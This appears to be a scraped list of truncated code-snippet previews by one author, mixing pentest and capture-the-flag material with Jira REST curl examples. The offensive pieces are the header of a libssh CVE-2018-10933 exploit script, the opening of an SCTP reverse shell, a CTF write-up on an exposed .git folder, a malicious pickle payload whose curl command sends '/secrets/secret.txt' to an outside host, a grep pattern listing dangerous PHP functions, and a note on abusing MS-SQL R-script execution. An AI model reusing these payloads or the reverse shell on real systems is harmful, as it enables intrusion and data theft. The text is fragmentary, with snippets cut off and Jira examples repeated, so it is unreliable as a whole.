ricardojba

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8

ricardojba

#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`

import os, socket, subprocess

RHOST = '127.0.0.1'
RPORT = 1234

ricardojba

-- challenge 1:
From the name of the challenge it was a dead giveway that there was a .git folder exposed.

Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config

And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git

Finally check all the commits and on this one at the bottom of the page you can read a flag:

ricardojba

cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.

FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?

#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information on an issue
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345

#Adds a comment to an existing issue
curl -D- -u uname:pass -X PUT -d "{\"update\": {\"comment\": [{\"add\": {\"body\": \"Comment added when resolving issue\"}}]}}" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345

#Transitions an issue

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?

#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'

ricardojba

JIRA_REST_URL="${JIRA_REST_URL:-https://MYCOMPANY.jira.com/rest/api/2}"
JIRA_CREDENTIALS="${JIRA_CREDENTIALS:-user:password}"

# https://developer.atlassian.com/jiradev/api-reference/jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-discovering-meta-data-for-creating-issues

# https://MYCOMPANY.jira.com/rest/api/2/issue/createmeta?projectKeys=MYPROJ&issuetypeNames=MyIssueType&expand=projects.issuetypes.fields
# customfield_10171: My Custom Field Name 1
# customfield_10172: My Custom Field Name 2

# This methods create a new issue of type 'MyIssueType' in project 'MYPROJ' with 2 custom fields

ricardojba

#!/bin/bash

P="*"

if [ -n "$1" ]; then
	P="$1"
fi

grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s

ricardojba

# original https://pastebin.com/zBDnzELT

Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common.
 
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script().
 
This can be 'fun'..
 
Sample R query in MS-SQL (from MSDN):